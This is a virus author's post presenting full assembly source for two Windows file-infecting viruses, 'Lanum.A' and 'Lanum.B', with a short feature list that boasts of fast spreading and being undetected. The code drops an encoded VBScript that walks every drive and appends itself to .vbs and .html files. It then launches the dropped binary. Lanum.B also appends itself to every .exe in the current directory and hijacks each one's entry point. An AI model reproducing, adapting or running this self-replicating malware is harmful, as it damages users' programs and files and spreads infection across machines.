LANUM/Psychologic

Lanum Family is my only for fun virus, Simple multiplatform/XP/Vista/7/8 cross infection win32 PE-Script
virus. And they was made in different compiler, Lanum.A  uses tasm and Lanum.B the day after with flat asm,
I just try to compare both fasm and tasm at the moment, I think fasm its good and simple enough.


And here some descripiton about 

Lanum.A :

- Direct action WIn32 Integrated-Modular Script infection
- Using TASM environment
- Script read its binnary using adodb object, not base64
- Parasiting portable script with binnary in all drives via appending
- Fast spreading
- Uses WinEXEC API to call
- No encrypt  ---> to make it easy to be understand
- No EPO      ---> to make it easy to be understand
- Undetected yet (maybe someday will)
- Will Work stable on all Win* version with wsh


Lanum.B :

- Direct action WIn32/PE Last appender
- Direct action Modular Script infection
- Using FASM environment
- Infect Curent directory PE/EXE with simple way.
- (No EPO/No Encrypt) only proof of concept to make it easy to be understand
- Parasiting portable script with binnary in all drives via appending and run when host executed
- Script read its binnary using adodb object, not base64
- Fast spreading
- Uses WinEXEC API to call script (Createprocess wont work to call script)
- No encrypt script  ---> make it easy to be understand
- No EPO script     ---> make it easy to be understand
- Will Work stable on all Win* version with wsh


This virus has been tested on XP/Vista/7 should be work also on win8

----------------------------------------------------------------LANUM.A CODE CUT
.386
.model flat
jumps

extrn GetCommandLineA		:PROC
extrn lstrcpyA			:PROC
extrn lstrcatA			:PROC
extrn CopyFileA			:PROC
extrn WriteFile			:PROC
extrn CloseHandle		:PROC
extrn CreateFileA		:PROC
extrn ExitProcess		:PROC
extern ShellExecuteA		:PROC
extern WinExec			:PROC
.data

__Me			db 	260d dup (0)	
__Copy			db 	68d,58d,92d,76d,65d,78d,85d,77d,46d,69d,88d,69d

num_bytes_written       dd      ? 
vfile                   db      68d,58d,92d,76d,65d,78d,85d,77d,46d,86d,66d,83d,00h
cmdline                 db      67d,83d,67d,82d,73d,80d,84d,32d,68d,58d,92d,108d,97d,110d,117d,109d,46d,118d,98d,115d,00h
flz_handle              dd      ?
vscript_filesize 	equ 	offset EndDropper - offset Dropper

FILE_ATTRIBUTE_NORMAL   equ     00000080h
CREATE_ALWAYS           equ     00000002h
FILE_SHARE_READ         equ     00000001h
GENERIC_WRITE           equ     40000000h


Dropper:
db 82d,69d,77d,32d,76d,65d,78d,85d,77d,13d,10d,111d,110d
db 32d,101d,114d,114d,111d,114d,32d,114d,101d,115d,117d,109d,101d
db 32d,110d,101d,120d,116d,13d,10d,109d,115d,103d,98d,111d,120d
db 32d,34d,87d,105d,110d,51d,50d,47d,80d,69d,47d,72d,84d
db 77d,47d,86d,66d,83d,32d,76d,65d,78d,85d,77d,32d,86d
db 105d,114d,117d,115d,32d,70d,97d,109d,105d,108d,121d,32d,45d
db 32d,80d,115d,121d,99d,104d,111d,108d,111d,103d,105d,99d,47d
db 51d,102d,34d,44d,118d,98d,105d,110d,102d,111d,114d,109d,97d
db 116d,105d,111d,110d,44d,34d,76d,97d,110d,117d,109d,32d,118d
db 105d,114d,117d,115d,32d,45d,32d,80d,115d,121d,99d,104d,111d
db 108d,111d,103d,105d,99d,34d,13d,10d,99d,111d,110d,115d,116d
db 32d,97d,100d,84d,121d,112d,101d,66d,105d,110d,97d,114d,121d
db 61d,49d,32d,13d,10d,67d,111d,110d,115d,116d,32d,97d,100d
db 84d,121d,112d,101d,84d,101d,120d,116d,61d,50d,32d,13d,10d
db 115d,101d,116d,32d,98d,115d,61d,99d,114d,101d,97d,116d,101d
db 111d,98d,106d,101d,99d,116d,40d,34d,65d,68d,79d,68d,66d
db 46d,83d,116d,114d,101d,97d,109d,34d,41d,13d,10d,98d,115d
db 46d,84d,121d,112d,101d,61d,49d,58d,98d,115d,46d,111d,112d
db 101d,110d,58d,98d,115d,46d,108d,111d,97d,100d,102d,114d,111d
db 109d,102d,105d,108d,101d,32d,34d,68d,58d,92d,76d,65d,78d
db 85d,77d,46d,69d,88d,69d,34d,58d,98d,115d,46d,102d,108d
db 117d,115d,104d,58d,98d,115d,46d,112d,111d,115d,105d,116d,105d
db 111d,110d,32d,61d,32d,48d,13d,10d,98d,115d,46d,116d,121d
db 112d,101d,61d,50d,58d,98d,115d,46d,99d,104d,97d,114d,115d
db 101d,116d,61d,34d,105d,115d,111d,45d,56d,56d,53d,57d,45d
db 49d,34d,58d,109d,61d,98d,115d,46d,114d,101d,97d,100d,116d
db 101d,120d,116d,58d,104d,61d,48d,58d,13d,10d,70d,111d,114d
db 32d,107d,32d,61d,32d,49d,32d,84d,111d,32d,76d,101d,110d
db 40d,109d,41d,13d,10d,104d,61d,104d,43d,49d,13d,10d,115d
db 116d,114d,67d,104d,97d,114d,32d,61d,32d,77d,105d,100d,40d
db 109d,44d,32d,107d,44d,32d,49d,41d,13d,10d,115d,116d,114d
db 72d,101d,120d,32d,61d,32d,82d,105d,103d,104d,116d,40d,34d
db 48d,48d,34d,32d,38d,32d,72d,101d,120d,40d,65d,115d,99d
db 40d,115d,116d,114d,67d,104d,97d,114d,41d,41d,44d,32d,50d
db 41d,13d,10d,105d,102d,32d,104d,61d,49d,48d,48d,32d,116d
db 104d,101d,110d,13d,10d,115d,116d,114d,104d,101d,120d,118d,97d
db 108d,117d,101d,32d,61d,32d,115d,116d,114d,72d,101d,120d,86d
db 97d,108d,117d,101d,32d,38d,32d,115d,116d,114d,104d,101d,120d
db 32d,38d,32d,99d,104d,114d,40d,51d,52d,41d,32d,38d,32d
db 118d,98d,99d,114d,108d,102d,32d,38d,32d,34d,115d,116d,114d
db 72d,101d,120d,86d,97d,108d,117d,101d,61d,115d,116d,114d,72d
db 101d,120d,86d,97d,108d,117d,101d,38d,34d,32d,38d,32d,99d
db 104d,114d,40d,51d,52d,41d,13d,10d,104d,61d,48d,13d,10d
db 101d,108d,115d,101d,13d,10d,115d,116d,114d,104d,101d,120d,118d
db 97d,108d,117d,101d,32d,61d,32d,115d,116d,114d,72d,101d,120d
db 86d,97d,108d,117d,101d,32d,38d,32d,115d,116d,114d,104d,101d
db 120d,13d,10d,101d,110d,100d,32d,105d,102d,13d,10d,110d,101d
db 120d,116d,13d,10d,115d,101d,116d,32d,76d,65d,78d,85d,77d
db 32d,61d,32d,67d,114d,101d,97d,116d,101d,79d,98d,106d,101d
db 99d,116d,40d,34d,87d,83d,99d,114d,105d,112d,116d,46d,83d
db 104d,101d,108d,108d,34d,41d,32d,13d,10d,83d,101d,116d,32d
db 102d,115d,111d,32d,61d,32d,99d,114d,101d,97d,116d,101d,111d
db 98d,106d,101d,99d,116d,40d,34d,115d,99d,114d,105d,112d,116d
db 105d,110d,103d,46d,102d,105d,108d,101d,115d,121d,115d,116d,101d
db 109d,111d,98d,106d,101d,99d,116d,34d,41d,13d,10d,83d,101d
db 116d,32d,68d,114d,105d,118d,101d,115d,61d,102d,115d,111d,46d
db 100d,114d,105d,118d,101d,115d,32d,13d,10d,70d,111d,114d,32d
db 69d,97d,99d,104d,32d,68d,114d,105d,118d,101d,32d,105d,110d
db 32d,68d,114d,105d,118d,101d,115d,13d,10d,73d,102d,32d,100d
db 114d,105d,118d,101d,46d,105d,115d,114d,101d,97d,100d,121d,32d
db 116d,104d,101d,110d,13d,10d,68d,111d,115d,101d,97d,114d,99d
db 104d,32d,100d,114d,105d,118d,101d,32d,38d,32d,34d,92d,34d
db 13d,10d,101d,110d,100d,32d,73d,102d,32d,13d,10d,78d,101d
db 120d,116d,32d,13d,10d,102d,117d,110d,99d,116d,105d,111d,110d
db 32d,68d,111d,115d,101d,97d,114d,99d,104d,40d,112d,97d,116d
db 104d,41d,13d,10d,111d,110d,32d,101d,114d,114d,111d,114d,32d
db 114d,101d,115d,117d,109d,101d,32d,110d,101d,120d,116d,13d,10d
db 83d,101d,116d,32d,70d,111d,108d,100d,101d,114d,61d,102d,115d
db 111d,46d,103d,101d,116d,102d,111d,108d,100d,101d,114d,40d,112d
db 97d,116d,104d,41d,13d,10d,83d,101d,116d,32d,70d,105d,108d
db 101d,115d,32d,61d,32d,102d,111d,108d,100d,101d,114d,46d,102d
db 105d,108d,101d,115d,13d,10d,70d,111d,114d,32d,69d,97d,99d
db 104d,32d,70d,105d,108d,101d,32d,105d,110d,32d,102d,105d,108d
db 101d,115d,13d,10d,73d,102d,32d,102d,115d,111d,46d,71d,101d
db 116d,69d,120d,116d,101d,110d,115d,105d,111d,110d,78d,97d,109d
db 101d,40d,102d,105d,108d,101d,46d,112d,97d,116d,104d,41d,61d
db 34d,118d,98d,115d,34d,32d,116d,104d,101d,110d,13d,10d,83d
db 101d,116d,32d,83d,99d,114d,105d,112d,116d,115d,32d,61d,32d
db 70d,83d,79d,46d,79d,112d,101d,110d,84d,101d,120d,116d,70d
db 105d,108d,101d,40d,70d,105d,108d,101d,46d,112d,97d,116d,104d
db 44d,32d,49d,44d,32d,84d,114d,117d,101d,41d,13d,10d,73d
db 102d,32d,83d,99d,114d,105d,112d,116d,115d,46d,82d,101d,97d
db 100d,76d,105d,110d,101d,32d,60d,62d,32d,34d,82d,69d,77d
db 32d,76d,65d,78d,85d,77d,34d,32d,116d,104d,101d,110d,13d
db 10d,83d,101d,116d,32d,83d,99d,114d,105d,112d,116d,115d,32d
db 61d,32d,70d,83d,79d,46d,79d,112d,101d,110d,84d,101d,120d
db 116d,70d,105d,108d,101d,40d,70d,105d,108d,101d,46d,112d,97d
db 116d,104d,44d,32d,49d,44d,32d,84d,114d,117d,101d,41d,13d
db 10d,83d,99d,114d,105d,112d,116d,115d,83d,111d,117d,114d,99d
db 101d,32d,61d,32d,83d,99d,114d,105d,112d,116d,115d,46d,82d
db 101d,97d,100d,65d,108d,108d,13d,10d,83d,101d,116d,32d,117d
db 32d,61d,32d,70d,83d,79d,46d,79d,112d,101d,110d,84d,101d
db 120d,116d,70d,105d,108d,101d,40d,70d,105d,108d,101d,46d,112d
db 97d,116d,104d,44d,32d,50d,44d,32d,84d,114d,117d,101d,41d
db 13d,10d,117d,46d,87d,114d,105d,116d,101d,76d,105d,110d,101d
db 32d,34d,82d,69d,77d,32d,76d,65d,78d,85d,77d,34d,13d
db 10d,117d,46d,87d,114d,105d,116d,101d,76d,105d,110d,101d,32d
db 83d,99d,114d,105d,112d,116d,115d,83d,111d,117d,114d,99d,101d
db 13d,10d,117d,46d,87d,114d,105d,116d,101d,76d,105d,110d,101d
db 32d,34d,115d,116d,114d,72d,101d,120d,86d,97d,108d,117d,101d
db 61d,34d,32d,38d,32d,99d,104d,114d,40d,51d,52d,41d,32d
db 38d,32d,115d,116d,114d,104d,101d,120d,118d,97d,108d,117d,101d
db 32d,38d,32d,99d,104d,114d,40d,51d,52d,41d,13d,10d,117d
db 46d,87d,114d,105d,116d,101d,76d,105d,110d,101d,32d,34d,83d
db 101d,116d,32d,111d,98d,106d,70d,83d,79d,32d,61d,32d,67d
db 114d,101d,97d,116d,101d,79d,98d,106d,101d,99d,116d,40d,34d
db 32d,38d,99d,104d,114d,40d,51d,52d,41d,32d,38d,32d,34d
db 83d,99d,114d,105d,112d,116d,105d,110d,103d,46d,70d,105d,108d
db 101d,83d,121d,115d,116d,101d,109d,79d,98d,106d,101d,99d,116d
db 34d,32d,38d,99d,104d,114d,40d,51d,52d,41d,32d,38d,32d
db 34d,41d,34d,13d,10d,117d,46d,87d,114d,105d,116d,101d,76d
db 105d,110d,101d,32d,34d,70d,111d,114d,32d,114d,61d,32d,49d
db 32d,84d,111d,32d,76d,101d,110d,40d,115d,116d,114d,72d,101d
db 120d,86d,97d,108d,117d,101d,41d,32d,83d,116d,101d,112d,32d
db 50d,32d,58d,32d,78d,101d,119d,67d,111d,100d,101d,32d,61d
db 32d,78d,101d,119d,67d,111d,100d,101d,32d,38d,32d,67d,104d
db 114d,40d,34d,32d,38d,99d,104d,114d,40d,51d,52d,41d,32d
db 38d,32d,34d,38d,104d,34d,32d,38d,32d,99d,104d,114d,40d
db 51d,52d,41d,32d,38d,32d,34d,38d,32d,77d,105d,100d,40d
db 115d,116d,114d,72d,101d,120d,86d,97d,108d,117d,101d,44d,32d
db 114d,44d,32d,50d,41d,41d,32d,58d,32d,110d,101d,120d,116d
db 34d,13d,10d,117d,46d,87d,114d,105d,116d,101d,76d,105d,110d
db 101d,32d,34d,83d,101d,116d,32d,111d,98d,106d,70d,105d,108d
db 101d,50d,32d,61d,32d,111d,98d,106d,70d,83d,79d,46d,67d
db 114d,101d,97d,116d,101d,84d,101d,120d,116d,70d,105d,108d,101d
db 40d,34d,32d,38d,32d,99d,104d,114d,40d,51d,52d,41d,32d
db 38d,32d,34d,76d,65d,78d,85d,77d,46d,69d,88d,69d,34d
db 32d,38d,32d,99d,104d,114d,40d,51d,52d,41d,32d,38d,32d
db 34d,41d,32d,58d,32d,111d,98d,106d,70d,105d,108d,101d,50d
db 46d,119d,114d,105d,116d,101d,32d,32d,78d,101d,119d,67d,111d
db 100d,101d,32d,58d,32d,111d,98d,106d,70d,105d,108d,101d,50d
db 46d,99d,108d,111d,115d,101d,34d,32d,13d,10d,117d,46d,87d
db 114d,105d,116d,101d,76d,105d,110d,101d,32d,34d,67d,114d,101d
db 97d,116d,101d,79d,98d,106d,101d,99d,116d,40d,34d,32d,38d
db 32d,99d,104d,114d,40d,51d,52d,41d,32d,38d,32d,34d,87d
db 83d,99d,114d,105d,112d,116d,46d,83d,104d,101d,108d,108d,34d
db 32d,38d,32d,99d,104d,114d,40d,51d,52d,41d,32d,38d,32d
db 34d,41d,46d,114d,117d,110d,32d,34d,32d,38d,32d,99d,104d
db 114d,40d,51d,52d,41d,32d,38d,32d,34d,76d,65d,78d,85d
db 77d,46d,69d,88d,69d,34d,32d,38d,32d,99d,104d,114d,40d
db 51d,52d,41d,13d,10d,101d,110d,100d,32d,105d,102d,32d,13d
db 10d,101d,110d,100d,32d,105d,102d,13d,10d,73d,102d,32d,108d
db 99d,97d,115d,101d,40d,102d,115d,111d,46d,71d,101d,116d,69d
db 120d,116d,101d,110d,115d,105d,111d,110d,78d,97d,109d,101d,40d
db 102d,105d,108d,101d,46d,112d,97d,116d,104d,41d,41d,61d,34d
db 104d,116d,109d,108d,34d,32d,111d,114d,32d,108d,99d,97d,115d
db 101d,40d,102d,115d,111d,46d,71d,101d,116d,69d,120d,116d,101d
db 110d,115d,105d,111d,110d,78d,97d,109d,101d,40d,102d,105d,108d
db 101d,46d,112d,97d,116d,104d,41d,41d,61d,34d,104d,116d,109d
db 34d,32d,116d,104d,101d,110d,13d,10d,83d,101d,116d,32d,83d
db 99d,114d,105d,112d,116d,115d,32d,61d,32d,70d,83d,79d,46d
db 79d,112d,101d,110d,84d,101d,120d,116d,70d,105d,108d,101d,40d
db 70d,105d,108d,101d,46d,112d,97d,116d,104d,44d,32d,49d,44d
db 32d,84d,114d,117d,101d,41d,13d,10d,73d,102d,32d,83d,99d
db 114d,105d,112d,116d,115d,46d,82d,101d,97d,100d,76d,105d,110d
db 101d,32d,60d,62d,32d,34d,60d,33d,45d,45d,76d,65d,78d
db 85d,77d,45d,45d,62d,34d,32d,116d,104d,101d,110d,13d,10d
db 83d,101d,116d,32d,83d,99d,114d,105d,112d,116d,115d,32d,61d
db 32d,70d,83d,79d,46d,79d,112d,101d,110d,84d,101d,120d,116d
db 70d,105d,108d,101d,40d,70d,105d,108d,101d,46d,112d,97d,116d
db 104d,44d,32d,49d,44d,32d,84d,114d,117d,101d,41d,13d,10d
db 83d,99d,114d,105d,112d,116d,115d,83d,111d,117d,114d,99d,101d
db 32d,61d,32d,83d,99d,114d,105d,112d,116d,115d,46d,82d,101d
db 97d,100d,65d,108d,108d,32d,13d,10d,83d,101d,116d,32d,117d
db 32d,61d,32d,70d,83d,79d,46d,79d,112d,101d,110d,84d,101d
db 120d,116d,70d,105d,108d,101d,40d,70d,105d,108d,101d,46d,112d
db 97d,116d,104d,44d,32d,50d,44d,32d,84d,114d,117d,101d,41d
db 13d,10d,117d,46d,119d,114d,105d,116d,101d,108d,105d,110d,101d
db 32d,34d,60d,33d,45d,45d,76d,65d,78d,85d,77d,45d,45d
db 62d,34d,32d,13d,10d,117d,46d,119d,114d,105d,116d,101d,108d
db 105d,110d,101d,32d,34d,60d,104d,116d,109d,108d,62d,60d,66d
db 111d,100d,121d,62d,60d,83d,99d,114d,105d,112d,116d,32d,108d
db 97d,110d,103d,117d,97d,103d,101d,61d,34d,32d,38d,32d,99d
db 104d,114d,40d,51d,52d,41d,32d,38d,32d,34d,86d,66d,83d
db 99d,114d,105d,112d,116d,34d,32d,38d,32d,99d,104d,114d,40d
db 51d,52d,41d,32d,38d,32d,34d,62d,34d,13d,10d,117d,46d
db 87d,114d,105d,116d,101d,76d,105d,110d,101d,32d,34d,115d,116d
db 114d,72d,101d,120d,86d,97d,108d,117d,101d,61d,34d,32d,38d
db 32d,99d,104d,114d,40d,51d,52d,41d,32d,38d,32d,115d,116d
db 114d,104d,101d,120d,118d,97d,108d,117d,101d,32d,38d,32d,99d
db 104d,114d,40d,51d,52d,41d,13d,10d,117d,46d,87d,114d,105d
db 116d,101d,76d,105d,110d,101d,32d,34d,83d,101d,116d,32d,111d
db 98d,106d,70d,83d,79d,32d,61d,32d,67d,114d,101d,97d,116d
db 101d,79d,98d,106d,101d,99d,116d,40d,34d,32d,38d,99d,104d
db 114d,40d,51d,52d,41d,32d,38d,32d,34d,83d,99d,114d,105d
db 112d,116d,105d,110d,103d,46d,70d,105d,108d,101d,83d,121d,115d
db 116d,101d,109d,79d,98d,106d,101d,99d,116d,34d,32d,38d,99d
db 104d,114d,40d,51d,52d,41d,32d,38d,32d,34d,41d,34d,13d
db 10d,117d,46d,87d,114d,105d,116d,101d,76d,105d,110d,101d,32d
db 34d,70d,111d,114d,32d,114d,61d,32d,49d,32d,84d,111d,32d
db 76d,101d,110d,40d,115d,116d,114d,72d,101d,120d,86d,97d,108d
db 117d,101d,41d,32d,83d,116d,101d,112d,32d,50d,32d,58d,32d
db 78d,101d,119d,67d,111d,100d,101d,32d,61d,32d,78d,101d,119d
db 67d,111d,100d,101d,32d,38d,32d,67d,104d,114d,40d,34d,32d
db 38d,99d,104d,114d,40d,51d,52d,41d,32d,38d,32d,34d,38d
db 104d,34d,32d,38d,32d,99d,104d,114d,40d,51d,52d,41d,32d
db 38d,32d,34d,38d,32d,77d,105d,100d,40d,115d,116d,114d,72d
db 101d,120d,86d,97d,108d,117d,101d,44d,32d,114d,44d,32d,50d
db 41d,41d,32d,58d,32d,110d,101d,120d,116d,34d,13d,10d,117d
db 46d,87d,114d,105d,116d,101d,76d,105d,110d,101d,32d,34d,83d
db 101d,116d,32d,111d,98d,106d,70d,105d,108d,101d,50d,32d,61d
db 32d,111d,98d,106d,70d,83d,79d,46d,67d,114d,101d,97d,116d
db 101d,84d,101d,120d,116d,70d,105d,108d,101d,40d,34d,32d,38d
db 32d,99d,104d,114d,40d,51d,52d,41d,32d,38d,32d,34d,76d
db 65d,78d,85d,77d,46d,69d,88d,69d,34d,32d,38d,32d,99d
db 104d,114d,40d,51d,52d,41d,32d,38d,32d,34d,41d,32d,58d
db 32d,111d,98d,106d,70d,105d,108d,101d,50d,46d,119d,114d,105d
db 116d,101d,32d,32d,78d,101d,119d,67d,111d,100d,101d,32d,58d
db 32d,111d,98d,106d,70d,105d,108d,101d,50d,46d,99d,108d,111d
db 115d,101d,34d,13d,10d,117d,46d,87d,114d,105d,116d,101d,76d
db 105d,110d,101d,32d,34d,67d,114d,101d,97d,116d,101d,79d,98d
db 106d,101d,99d,116d,40d,34d,32d,38d,32d,99d,104d,114d,40d
db 51d,52d,41d,32d,38d,32d,34d,87d,83d,99d,114d,105d,112d
db 116d,46d,83d,104d,101d,108d,108d,34d,32d,38d,32d,99d,104d
db 114d,40d,51d,52d,41d,32d,38d,32d,34d,41d,46d,114d,117d
db 110d,32d,34d,32d,38d,32d,99d,104d,114d,40d,51d,52d,41d
db 32d,38d,32d,34d,76d,65d,78d,85d,77d,46d,69d,88d,69d
db 34d,32d,38d,32d,99d,104d,114d,40d,51d,52d,41d,13d,10d
db 117d,46d,119d,114d,105d,116d,101d,108d,105d,110d,101d,32d,34d
db 60d,34d,32d,38d,32d,99d,104d,114d,40d,52d,55d,41d,32d
db 38d,32d,34d,115d,99d,114d,105d,112d,116d,62d,60d,47d,98d
db 111d,100d,121d,62d,60d,47d,104d,116d,109d,108d,62d,34d,32d
db 13d,10d,117d,46d,87d,114d,105d,116d,101d,76d,105d,110d,101d
db 32d,83d,99d,114d,105d,112d,116d,115d,83d,111d,117d,114d,99d
db 101d,13d,10d,101d,110d,100d,32d,105d,102d,32d,13d,10d,101d
db 110d,100d,32d,105d,102d,13d,10d,110d,101d,120d,116d,13d,10d
db 83d,101d,116d,32d,83d,117d,98d,102d,111d,108d,100d,101d,114d
db 115d,32d,61d,32d,102d,111d,108d,100d,101d,114d,46d,83d,117d
db 98d,70d,111d,108d,100d,101d,114d,115d,13d,10d,70d,111d,114d
db 32d,69d,97d,99d,104d,32d,83d,117d,98d,102d,111d,108d,100d
db 101d,114d,32d,105d,110d,32d,83d,117d,98d,102d,111d,108d,100d
db 101d,114d,115d,13d,10d,68d,111d,115d,101d,97d,114d,99d,104d
db 32d,83d,117d,98d,102d,111d,108d,100d,101d,114d,46d,112d,97d
db 116d,104d,32d,13d,10d,78d,101d,120d,116d,13d,10d,101d,110d
db 100d,32d,102d,117d,110d,99d,116d,105d,111d,110d,13d,10d
EndDropper: 


.code
__Start:


call GetCommandLineA

inc eax	
push eax
push offset __Me
call lstrcpyA

mov esi, offset __Me
call __Quote
mov dword ptr [esi+4],0	

push 0	
push offset __Copy
push offset __Me
call CopyFileA	


push 00000000h
 push FILE_ATTRIBUTE_NORMAL
 push CREATE_ALWAYS
 push 00000000h
 push FILE_SHARE_READ
 push GENERIC_WRITE
 push offset vfile
 call CreateFileA
 mov  [flz_handle],eax

 ; shall write down in script
 push 00000000h
 push offset num_bytes_written
 push vscript_filesize
 push offset Dropper
 push [flz_handle]
 call WriteFile

 ; close file
 push [flz_handle]
 call CloseHandle




push	00000001
push	offset cmdline
call	WinExec



__Quote:				
cmp byte ptr [esi],'.'		
jz __found
inc esi	
jmp __Quote
__found:
ret


end __Start


----------------------------------------------------------------LANUM.b CODE CUT


include 'win32ax.inc'

macro kern proc,[arg]
 { common
    if ~ arg eq
     stdcall [ebp+proc],arg
    else
     call [ebp+proc]
    end if }



                lanumscript_filesize    equ (EndDropper-Dropper)
                lanum_size              equ (lanum_end-lanum_start)
                sizeof_searchfile       equ 314d
                filesize_variable       equ 32d
                program_name            equ 44d
                program_original_attributes equ 0d
                minimum_program_size    equ 1024d
                mzheader_size_variable  equ 60d
                default_section_size    equ 40d
                api_names               equ 32d
                api_ordinals            equ 36d
                api_rvas                equ 28d

                section_count           equ 6d
                program_entrypoint      equ 40d
                imagebase               equ 52d
                win32_version           equ 76d
                imagesize               equ 80d
                directory_entrys        equ 116d
                default_optionalheader_size equ 120d
                exporttable_rva         equ 120d


                section_virtual_size    equ 8d
                section_rva             equ 12d
                section_physical_size   equ 16d
                section_offset          equ 20d
                section_flags           equ 36d
                flags_read_write_execute equ 0A0000020h


; .code

lanum_start:    pop     ebx
                push    ebx

                call    get_delta

get_delta:      pop     ebp
                sub     ebp, get_delta

                and     ebx, 0ffff0000h

find_k32:       cmp     word [ebx], "MZ"
                jz      k32_found
                sub     ebx, 000010000h
                jmp     find_k32
k32_found:      mov     edx, [ebx+mzheader_size_variable]
                add     edx, ebx
                cmp     dword [edx], "PE"
                jnz     find_k32

                mov     edx, [edx+exporttable_rva]
                add     edx, ebx
                mov     esi, [edx+api_names]
                add     esi, ebx
                sub     ecx, ecx

find_GetProcAddress:
                inc     ecx
                lodsd
                add     eax, ebx
                cmp     dword [eax], "GetP"
                jnz     find_GetProcAddress
                cmp     dword [eax+4], "rocA"
                jnz     find_GetProcAddress
                cmp     dword [eax+8], "ddre"
                jnz     find_GetProcAddress

                mov     esi, [edx+api_ordinals]
                add     esi, ebx
                movzx   ecx, word [esi+ecx*2]
                dec     ecx

                mov     esi, [edx+api_rvas]
                add     esi, ebx
                mov     edx, [esi+ecx*4]
                add     edx, ebx
                mov     [ebp+GetProcAddress], edx

                lea     esi, [ebp+kernel32_apis]
                lea     edi, [ebp+kernel32_hndls]
                mov     ecx, 15

load_apis:      push    esi edi ecx ebx

                kern   GetProcAddress, ebx,esi

                pop     ebx ecx edi esi
                stosd

find_end_of_api:lodsb
                cmp     al, 0
                jnz     find_end_of_api
                loop    load_apis

apis_loaded:    kern   GlobalAlloc, GMEM_FIXED,sizeof_searchfile
                cmp     eax, NULL
                jz      globalalloc_failed
                mov     [ebp+findfile_mem], eax

                lea     eax, [ebp+exe_mask]
                kern   FindFirstFile, eax,[ebp+findfile_mem]
                cmp     eax, INVALID_HANDLE_VALUE
                je      find_files_failed
                mov     [ebp+findfile_handle], eax

more_hosts:     push    [ebp+original_entrypoint]
                call    infect_file
                pop     [ebp+original_entrypoint]

                kern   FindNextFile, [ebp+findfile_handle],[ebp+findfile_mem]
                cmp     eax, NULL
                jnz     more_hosts

                kern   FindClose, [ebp+findfile_handle]
                call    runscript
find_files_failed:
                kern   GlobalFree, [ebp+findfile_mem]

globalalloc_failed:
                jmp     [ebp+original_entrypoint]


infect_file:    mov     edi, [ebp+findfile_mem]
                mov     eax, [edi+filesize_variable]
                cmp     eax, minimum_program_size
                jb      program_not_valid
                add     eax, lanum_size
                mov     [ebp+program_newsize], eax

                lea     esi, [edi+program_name]

                kern   SetFileAttributes,esi,FILE_ATTRIBUTE_NORMAL
                cmp     eax, NULL
                jz      program_not_valid

                kern   CreateFile, esi,GENERIC_READ or GENERIC_WRITE,FILE_SHARE_READ,NULL,\
                        OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL
                cmp     eax, INVALID_HANDLE_VALUE
                jz      error_open_program
                mov     [ebp+file_handle], eax

                kern   GlobalAlloc, GMEM_FIXED,[ebp+program_newsize]
                cmp     eax, NULL
                jz      error_load_buffer
                mov     [ebp+mem_handle], eax

                lea     eax, [ebp+nbrw]
                kern   ReadFile, [ebp+file_handle],[ebp+mem_handle],dword [edi+filesize_variable],eax,NULL
                cmp     eax, NULL
                jz      error_read_program

                kern   SetFilePointer, [ebp+file_handle],NULL,NULL,FILE_BEGIN
                cmp     eax, 0FFFFFFFFh
                jz      error_read_program

                mov     ebx, [ebp+mem_handle]
                cmp     word [ebx], "MZ"
                jnz     error_invalid_program
                mov     edi, [ebx+mzheader_size_variable]
                add     edi, ebx
                cmp     dword [edi], "PE"
                jnz     error_invalid_program

                cmp     dword [edi+win32_version], mark
                jz      error_invalid_program

                mov     dword [edi+win32_version], mark

                mov     esi, edi
                movzx   eax, word [edi+section_count]
                dec     eax
                imul    eax, default_section_size
                add     esi, eax
                add     esi, default_optionalheader_size
                mov     edx, [edi+directory_entrys]
                shl     edx, 3
                add     esi, edx

                mov     eax, [esi+section_rva]
                add     eax, [esi+section_physical_size]
                xchg    eax, [edi+program_entrypoint]
                add     eax, [edi+imagebase]
                mov     [ebp+original_entrypoint], eax

                mov     ecx, lanum_size
                add     [esi+section_virtual_size], ecx
                mov     eax, [esi+section_virtual_size]
                add     eax, [esi+section_rva]
                mov     [edi+imagesize], eax
                mov     eax, [esi+section_physical_size]
                add     [esi+section_physical_size], ecx
                or      dword [esi+section_flags], flags_read_write_execute
                mov     edi, [esi+section_offset]
                add     edi, ebx
                add     edi, eax
                lea     esi, [ebp+lanum_start]
                rep     movsb

                lea     eax, [ebp+nbrw]
                kern   WriteFile, [ebp+file_handle],[ebp+mem_handle],[ebp+program_newsize],eax,NULL

error_invalid_program:
error_read_program:
                kern   GlobalFree, [ebp+mem_handle]

error_load_buffer:
                kern   CloseHandle, [ebp+file_handle]

error_open_program:
                mov     edi, [ebp+findfile_mem]
                lea     eax, [edi+program_name]
                kern   SetFileAttributes,eax,dword [edi+program_original_attributes]

program_not_valid:
                ret

runscript:
kern GetCommandLineA 

                inc eax
                push eax
                push __Me
                kern lstrcpyA

                mov esi,__Me
                call __Quote
                mov dword [esi+4],0

                push 0
                push __Copy
                push __Me
                kern CopyFileA

                push 00000000h
                push FILE_ATTRIBUTE_NORMAL
                push CREATE_ALWAYS
                push 00000000h
                push FILE_SHARE_READ
                push GENERIC_WRITE
                push vfile
                kern CreateFile
                mov  [flz_handle],eax

                push 00000000h
                push num_bytes_written
                push lanumscript_filesize
                push Dropper
                push [flz_handle]
                kern WriteFile

                push [flz_handle]
                kern CloseHandle

                push    00000001
                push    cmdline
                kern    WinExec

                __Quote:
                cmp byte [esi],'.'
                jz __found
                inc esi
                jmp __Quote
                __found:
                        ret


; .data

kernel32_apis:  db      "CloseHandle",0 
                db      "CreateFileA",0
                db      "FindClose",0
                db      "FindFirstFileA",0
                db      "FindNextFileA",0
                db      "GlobalAlloc",0
                db      "GlobalFree",0
                db      "ReadFile",0
                db      "SetFileAttributesA",0
                db      "SetFilePointer",0
                db      "WriteFile",0
                db      "GetCommandLineA",0
                db      "CopyFileA",0
                db      "WinExec",0
                db      "lstrcpyA",0
                exe_mask                db "*.exe",0

                original_entrypoint     dd fake_host_addr
                mark                    db "FUCK",0

; .data?

kernel32_hndls: CloseHandle     dd ?
                CreateFile      dd ?
                FindClose       dd ?
                FindFirstFile   dd ?
                FindNextFile    dd ?
                GlobalAlloc     dd ?
                GlobalFree      dd ?
                ReadFile        dd ?
                SetFileAttributes dd ?
                SetFilePointer  dd ?
                WriteFile       dd ?
                GetCommandLineA  dd ?
                CopyFileA  dd ?
                WinExec  dd ?
                lstrcpyA  dd ?
                GetProcAddress  dd ?
                findfile_mem    dd ?
                findfile_handle dd ?
                program_newsize dd ?
                file_handle     dd ?
                mem_handle      dd ?

                nbrw            dd ?

;lANUM
__Me                    db      260d dup (0)
__Copy                  db      68d,58d,92d,76d,65d,78d,85d,77d,46d,69d,88d,69d
